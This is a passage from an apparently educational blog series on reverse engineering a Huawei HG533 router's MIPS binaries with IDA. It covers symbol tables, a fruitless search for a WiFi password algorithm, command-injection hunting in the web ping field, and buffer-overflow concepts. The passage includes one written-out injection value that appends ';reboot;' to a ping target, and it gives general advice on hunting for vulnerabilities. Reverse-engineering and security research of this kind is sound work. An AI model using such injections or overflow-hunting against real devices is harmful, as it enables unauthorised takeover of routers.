That being said, if you’re looking for 0-days, backdoors or sensitive data, your best bet is not the open source projects. Devic specific and closed source code developed by the manufacturer or one of their providers has not been so heavily tested and may very well be riddled with bugs. Most of this code is stored as binaries in the user space; we’ve got the entire filesystem, so we’re good.

Without the source code for user space binaries, we need to find a way to read the machine code inside them. That’s where disassembly comes in.

Binary Disassembly [Theory]

The code inside every executable binary is just a compilation of instructions encoded as Machine Code so they can be processed by the CPU. Our processor’s datasheet will explain the direct equivalence between assembly instructions and their machine code representations. A disassembler has been given that equivalence so it can go through the binary, find data and machine code andtranslate it into assembly. Assembly is not pretty, but at least it’s human-readable.

Due to the very low-level nature of the kernel, and how heavily it interacts with the hardware, it is incredibly difficult to make any sense of its binary. User space binaries, on the other hand, are abstracted away from the hardware and follow unix standards for calling conventions, binary format, etc. They’re an ideal target for disassembly.

There are lots of disassemblers for popular architectures like MIPS; some better than others both in terms of functionality and usability. I’d say these 3 are the most popular and powerful disassemblers in the market right now:

  • IDA Pro: By far the most popular disassembler/debugger in the market. It is extremely powerful, multi-platform, and there are loads of users, tutorials, plugins, etc. around it. Unfortunately, it’s also VERY expensive; a single person license of the Pro version (required to disassemble MIPS binaries) costs over $1000
  • Radare2: Completely Open Source, uses an impressively advanced command line interface, and there’s a great community of hackers around it. On the other hand, the complex command line interface -necessary for the sheer amount of features- makes for a rather steep learning curve
  • Binary Ninja: Not open source, but reasonably priced at $100 for a personal license, it’s middle ground between IDA and radare. It’s still a very new tool; it was just released this year, but it’s improving and gaining popularity day by day. It already works very well for some architectures, but unfortunately it’s still missing MIPS support (coming soon) and some other features I needed for these binaries. I look forward to giving it another try when it’s more mature

In order to display the assembly code in a more readable way, all these disasemblers use a “Graph View”. It provides an intuitive way to follow the different possible execution flows in the binary:

IDA Small Function Graph View

Such a clear representation of branches, and their conditionals, loops, etc. is extremely useful. Without it, we’d have to manually jump from one branch to another in the raw assembly code. Not so fun.

If you read the code in that function you can see the disassembler makes a great job displaying references to functions and hardcoded strings. That might be enough to help us find something juicy, but in most cases you’ll need to understand the assembly code to a certain extent.

Gathering Intel on the CPU and Its Assembly Code [Theory]

Let’s take a look at the format of our binaries:

$ file bin/busybox
bin/busybox: ELF 32-bit LSB executable, MIPS, MIPS-II version 1 (SYSV), dynamically linked (uses shared libs), corrupted section header size

Because ELF headers are designed to be platform-agnostic, we can easily find out some info about our binaries. As you can see, we know the architecture (32-bit MIPS), endianness (LSB), and whether it uses shared libraries.

We can verify that information thanks to the Ralink’s product brief, which specifies the processor core it uses: MIPS24KEc

Product Brief Highlighted Processor Core

With the exact version of the CPU core, we can easily find its datasheet as released by the company that designed it: Imagination Technologies.

Once we know the basics we can just drop the binary into the disassembler. It will help validate some of our findings, and provide us with the assembly code. In order to understand that code we’re gonna need to know the architecture’s instruction sets and register names:

  • MIPS Instruction Set
  • MIPS Pseudo-Instructions: Very simple combinations of basic instructions, used for developer/reverser convenience
  • MIPS Alternate Register Names: In MIPS, there’s no real difference between registers; the CPU doesn’t about what they’re called. Alternate register names exist to make the code more readable for the developer/reverser: $a0 to $a3 for function arguments, $t0 to $t9 for temporary registers, etc.

Beyond instructions and registers, some architectures may have some quirks. One example of this would be the presence of delay slots in MIPS: Instructions that appear immediately after branch instructions (e.g. beqzjalr) but are actually executed before the jump. That sort of non-linearity would be unthinkable in other architectures.

Some interesting links if you’re trying to learn MIPS: Intro to MIPS Reversing using Radare2MIPS Assembler and Runtime SimulatorToolchains to cross-compile for MIPS targets.

Example of User Space Binary Disassembly

Following up on the reset key example we were using for the Kernel, we’ve got the code that generated some of the UART log messages, but not all of them. Since we couldn’t find the ‘button has been pressed’ string in the kernel’s source code, we can deduce it must have come from user space. Let’s find out which binary printed it:

~/Tech/Reversing/Huawei-HG533_TalkTalk/router_filesystem
$ grep -i -r "restore default success" .
Binary file ./bin/cli matches
Binary file ./bin/equipcmd matches
Binary file ./lib/libcfmapi.so matches

3 files contain the next string found in the logs: 2 executables in /bin/ and 1 shared object in /lib/. Let’s take a look at /bin/equipcmd with IDA:

restore success string in /bin/equipcmd - IDA GUI

If we look closely, we can almost read the C code that was compiled into these instructions. We can see a “clear configuration file”, which would match the ERASEcommands we saw in the SPI traffic capture to the flash IC. Then, depending on the result, one of two strings is printed: restore default success or restore default fail . On success, it then prints something else, flushes some buffers and reboots; this also matches the behaviour we observed when we pressed the reset button.

That function is a perfect example of delay slots: the addiu instructions that set both strings as arguments —$a0— for the 2 puts are in the delay slots of the branch if equals zero and jump and link register instructions. They will actually be executed before branching/jumping.

As you can see, IDA has the name of all the functions in the binary. That won’t necessarily be the case in other binaries, and now’s a good time to discuss why.

Function Names in a Binary — Intro to Symbol Tables [Theory]

The ELF format specifies the usage of symbol tables: chunks of data inside a binary that provide useful debugging information. Part of that information are human-readable names for every function in the binary. This is extremely convenient for a developer debugging their binary, but in most cases it should be removed before releasing the production binary. The developers were nice enough to leave most of them in there 🙂

In order to remove them, the developers can use tools like strip, which know what must be kept and what can be spared. These tools serve a double purpose: They save memory by removing data that won’t be necessary at runtime, and they make the reversing process much more complicated for potential attackers. Function names give context to the code we’re looking at, which is massively helpful.

In some cases -mostly when disassembling shared objects- you may see somefunction names or none at all. The ones you WILL see are the Dynamic Symbols in the .dymsym table: We discussed earlier the massive amount of memory that can be saved by using shared objects to keep the pieces of code you need to re-use all over the system (e.g. printf()). In order to locate pieces of data inside the shared object, the caller uses their human-readable name. That means the names for functions and variables that need to be publicly accessible must be left in the binary. The rest of them can be removed, which is why ELF uses 2 symbol tables: .dynsym for publicly accessible symbols and .symtab for the internal ones.

For more details on symbol tables and other intricacies of the ELF format, check out: The ELF Format — How programs look from the insideInside ELF Symbol Tablesand the ELF spec (PDF).

Looking for the Default WiFi Password Generation Algorithm

What do We Know?

Remember the wifi password generation algorithm we discussed in part 3? (The Pot of Gold at the End of the Firmware) I explained then why I didn’t expect this router to have one, but let’s take a look anyway.

If you recall, these are the default WiFi credentials in my router:

Router Sticker - Annotated

So what do we know?

  1. Each device is pre-configured with a different set of WiFi credentials
  2. The credentials could be hardcoded at the factory or generated on the device. Either way, we know from previous posts that both SSID and password are stored in the reserved area of Flash memory, and they’re right next to each other
    • If they were hardcoded at the factory, the router only needs to read them from a known memory location
    • If they are generated in the device and then stored to flash, there must be an algorithm in the router that -given the same inputs- always generates the same outputs. If the inputs are public (e.g. the MAC address) and we can find, reverse and replicate the algorithm, we could calculate default WiFi passwords for any other router that uses the same algorithm

Let’s see what we can do with that…

Finding Hardcoded Strings

Let’s assume there IS such algorithm in the router. Between username and password, there’s only one string that remains constant across devices:TALKTALK-. This string is prepended to the last 6 characters of the MAC address. If the generation algorithm is in the router, surely this string must be hardcoded in there. Let’s look it up:

$ grep -r 'TALKTALK-' .
Binary file ./bin/cms matches
Binary file ./bin/nmbd matches
Binary file ./bin/smbd matches

2 of those 3 binaries (nmbd and smbd) are part of samba, the program used to use the USB flash drive as a network storage device. They’re probably used to identify the router over the network. Let’s take a look at the other one: /bin/cms.

Reversing the Functions that Uses Them

IDA TALKTALK-XXXXXX String Being Built

That looks exactly the way we’d expect the SSID generation algorithm to look. The code is located inside a rather large function called ATP_WLAN_Init, and somewhere in there it performs the following actions:

  1. Find out the MAC address of the device we’re running on:
    • mac = BSP_NET_GetBaseMacAddress()
  2. Create the SSID string:
    • snprintf(SSID, "TALKTALK-%02x%02x%02x", mac[3], mac[4], mac[5])
  3. Save the string somewhere:
    • ATP_DBSetPara(SavedRegister3, 0xE8801E09, SSID)

Unfortunately, right after this branch the function simply does an ATP_DBSave and moves on to start running commands and whatnot. e.g.:

ATP_WLAN_Init moves on before you

Further inspection of this function and other references to ATP_DBSave did not reveal anything interesting.

Giving Up

After some time using this process to find potentially relevant pieces of code, reverse them, and analyse them, I didn’t find anything that looked like the password generation algorithm. That would confirm the suspicions I’ve had since we found the default credentials in the protected flash area: The manufacturer used proper security techniques and flashed the credentials at the factory, which is why there is no algorithm. Since the designers manufacture their own hardware, the decision makes perfect sense for this device. They can do whatever they want with their manufacturing lines, so they decided to do it right.

I might take another look at it in the future, or try to find it in some other router (I’d like to document the process of reversing it), but you should know this method DOES work for a lot of products. There’s a long history of freely available default WiFi password generators.

Since we already know how to find relevant code in the filesystem binaries, let’s see what else we can do with that knowledge.

Looking for Command Injection Vulnerabilities

One of the most common, easy to find and dangerous vulnerabilities is command injection. The idea is simple; we find an input string that is gonna be used as an argument for a shell command. We try to append our own commands and get them to execute, bypassing any filters that the developers may have implemented. In embedded devices, such vulnerabilities often result in full root control of the device.

These vulnerabilities are particularly common in embedded devices due to their memory constraints. Say you’re developing the web interface used by the users to configure the device; you want to add the possibility to ping a user-defined server from the router, because it’s very valuable information to debug network problems. You need to give the user the option to define the ping target, and you need to serve them the results:

Router WEB Interface Ping in action

Once you receive the data of which server to target, you have two options: You find a library with the ICMP protocol implemented and call it directly from the web backend, or you could use a single, standard function call and use the router’s already existing ping shell command. The later is easier to implement, saves memory, etc. and it’s the obvious choice. Taking user input (target server address) and using it as part of a shell command is where the danger comes in. Let’s see how this router’s web application, /bin/web, handles it:

/bin/web's ping function

A call to libc’s system() (not to be confused with a system call/syscall) is the easiest way to execute a shell command from an application. Sometimes developers wrap system() in custom functions in order to systematically filter all inputs, but there’s always something the wrapper can’t do or some developer who doesn’t get the memo.

Looking for references to system in a binary is an excellent way to find vectors for command injections. Just investigate the ones that look like may be using unfiltered user input. These are all the references to system() in the /bin/web binary:

xrefs to system in /bin/web

Even the names of the functions can give you clues on whether or not a reference to system() will receive user input. We can also see some references to PIN and PUK codes, SIMs, etc. Seems like this application is also used in some mobile product…

I spent some time trying to find ways around the filtering provided byatp_gethostbyname (anything that isn’t a domain name causes an error), but I couldn’t find anything in this field or any others. Further analysis may prove me wrong. The idea would be to inject something to the effects of this:

Attempt reboot injection on ping field

Which would result in this final string being executed as a shell command: ping google.com -c 1; reboot; ping 192.168.1.1 > /dev/null. If the router reboots, we found a way in.

As I said, I couldn’t find anything. Ideally we’d like to verify that for all input fields, whether they’re in the web interface or some other network interface. Another example of a network interface potentially vulnerable to remote command injections is the “LAN-Side DSL CPE Configuration” protocol, or TR-064. Even though this protocol was designed to be used over the internal network only, it’s been used to configure routers over the internet in the past. Command injection vulnerabilities in some implementations of this protocol have been used to remotely extract data like WiFi credentials from routers with just a few packets.

This router has a binary conveniently named /bin/tr064; if we take a look, we find this right in the main() function:

/bin/tr064 using /etc/serverkey.pem

That’s the private RSA key we found in Part 2 being used for SSL authentication. Now we might be able to supplant a router in the system and look for vulnerabilities in their servers, or we might use it to find other attack vectors. Most importantly, it closes the mistery of the private key we found while scouting the firmware.

Looking for More Complex Vulnerabilities [Theory]

Even if we couldn’t find any command injection vulnerabilities, there are always other vectors to gain control of the router. The most common ones are good old buffer overflows. Any input string into the router, whether it is for a shell command or any other purpose, is handled, modified and passed around the code. An error by the developer calculating expected buffer lengths, not validating them, etc. in those string operations can result in an exploitable buffer overflow, which an attacker can use to gain control of the system.

The idea behind a buffer overflow is rather simple: We manage to pass a string into the system that contains executable code. We override some address in the program so the execution flow jumps into the code we just injected. Now we can do anything that binary could do -in embedded systems like this one, where everything runs as root, it means immediate root pwnage.

Introducing an unexpectedly long input

Developing an exploit for this sort of vulnerability is not as simple as appending commands to find your way around a filter. There are multiple possible scenarios, and different techniques to handle them. Exploits using more involved techniques like ROP can become necessary in some cases. That being said, most household embedded systems nowadays are decades behind personal computers in terms of anti-exploitation techniques. Methods like Address Space Layout Randomization(ASLR), which are designed to make exploit development much more complicated, are usually disabled or not implemented at all.

If you’d like to find a potential vulnerability so you can learn exploit development on your own, you can use the same techniques we’ve been using so far. Find potentially interesting inputs, locate the code that manages them using function names, hardcoded strings, etc. and try to trigger a malfunction sending an unexpected input. If we find an improperly handled string, we might have an exploitable bug.

Once we’ve located the piece of disassembled code we’re going to attack, we’re mostly interested in string manipulation functions like strcpystrcat,sprintf, etc. Their more secure counterparts strncpystrncat, etc. are also potentially vulnerable to some techniques, but usually much more complicated to work with.

Pic of strcpy handling an input

Even though I’m not sure that function -extracted from /bin/tr064— is passed any user inputs, it’s still a good example of the sort of code you should be looking for. Once you find potentially insecure string operations that may handle user input, you need to figure out whether there’s an exploitable bug.

Try to cause a crash by sending unexpectedly long inputs and work from there. Why did it crash? How many characters can I send without causing a crash? Which payload can I fit in there? Where does it land in memory? etc. etc. I may write about this process in more detail at some point, but there’s plenty of literature available online if you’re interested.

Don’t spend all your efforts on the most obvious inputs only -which are also more likely to be properly filtered/handled-; using tools like the burp web proxy (or even the browser itself), we can modify fields like cookies to check for buffer overflows.

Web vulnerabilities like CSRF are also extremely common in embedded devices with web interfaces. Exploiting them to write to files or bypass authentication can lead to absolute control of the router, specially when combined with command injections. An authentication bypass for a router with the web interface available from the Internet could very well expose the network to being remotely man in the middle’d. They’re definitely an important attack vector, even though I’m not gonna go into how to find them.

Decompiling Binaries [Theory]

When you decompile a binary, instead of simply translating Machine Code to Assembly Code, the decompiler uses algorithms to identify functions, loops, branches, etc. and replicate them in a higher level language like C or Python.

That sounds like a brilliant idea for anybody who has been banging their head against some assembly code for a few hours, but an additional layer of abstraction means more potential errors, which can result in massive wastes of time.

In my (admittedly short) personal experience, the output just doesn’t look reliable enough. It might be fine when using expensive decompilers (IDA itself supports a couple of architectures), but I haven’t found one I can trust with MIPS binaries. That being said, if you’d like to give one a try, the RetDec online decompiler supports multiple architectures- including MIPS.

Binary Decompiled to C by RetDec

Even as a ‘high level’ language, the code is not exactly pretty to look at.

Next Steps

Whether we want to learn something about an algorithm we’re reversing, to debug an exploit we’re developing or to find any other sort of vulnerability, being able to execute (and, if possible, debug) the binary on an environment we fully control would be a massive advantage. In some/most cases -like this router-, being able to debug on the original hardware is not possible. In the next post, we’ll work on CPU emulation to debug the binaries in our own computers.

Thanks for reading! I’m sorry this post took so long to come out. Between work,hardwear.io and seeing family/friends, this post was written about 1 paragraph at a time from 4 different countries. Things should slow down for a while, so hopefully I’ll be able to publish Part 6 soon. I’ve also got some other reversing projects coming down the pipeline, starting with hacking the Amazon Echo and a router with JTAG. I’ll try to get to those soon, work permitting… Happy Hacking 🙂


Tips and Tricks

Mistaken xrefs and how to remove them

Sometimes an address is loaded into a register for 16bit/32bit adjustments. The contents of that address have no effect on the rest of the code; it’s just a routinary adjustment. If the address that is assigned to the register happens to be pointing to some valid data, IDA will rename the address in the assembly and display the contents in a comment.

It is up to you to figure out whether an x-ref makes sense or not. If it doesn’t, select the variable and press o in IDA to ignore the contents and give you only the address. This makes the code much less confusing.

Setting function prototypes so IDA comments the args around calls for us

Set the cursor on a function and press y. Set the prototype for the function: e.g. int memcpy(void *restrict dst, const void *restrict src, int n);. Note:IDA only understands built-in types, so we can’t use types like size_t.

Once again we can use the extern declarations found in the GPL source code. When available, find the declaration for a specific function, and use the same types and names for the arguments in IDA.

Taking Advantage of the GPL Source Code

If we wanna figure out what are the 1st and 2nd parameters of a function likeATP_DBSetPara, we can sometimes rely on the GPL source code. Lots of functions are not implemented in the kernel or any other open source component, but they’re still used from one of them. That means we can’t see the code we’re interested in, but we can see the extern declarations for it. Sometimes the source will include documentation comments or descriptive variable names; very useful info that the disassembly doesn’t provide:

ATP_DBSetPara extern declaration in gpl_source/inc/cfmapi.h

Unfortunately, the function documentation comment is not very useful in this case -seems like there were encoding issues with the file at some point, and everything written in Chinese was lost. At least now we know that the first argument is a list of keys, and the second is something they call ParamCMOParamCMO is a constant in our disassembly, so it’s probably just a reference to the key we’re trying to set.

Disassembly Methods — Linear Sweep vs Recursive Descent

The structure of a binary can vary greatly depending on compiler, developers, etc. How functions call each other is not always straightforward for a disassembler to figure out. That means you may run into lots of ‘orphaned’ functions, which exist in the binary but do not have a known caller.

Which disassembler you use will dictate whether you see those functions or not, some of which can be extremely important to us (e.g. the ping function in theweb binary we reversed earlier). This is due to how they scan binaries for content:

  1. Linear Sweep: Read the binary one byte at a time, anything that looks like a function is presented to the user. This requires significant logic to keep false positives to a minimum
  2. Recursive Descent: We know the binary’s entry point. We find all functions called from main(), then we find the functions called from those, and keep recursively displaying functions until we’ve got “all” of them. This method is very robust, but any functions not referenced in a standard/direct way will be left out

Make sure your disassembler supports linear sweep if you feel like you’re missing any data. Make sure the code you’re looking at makes sense if you’re using linear sweep.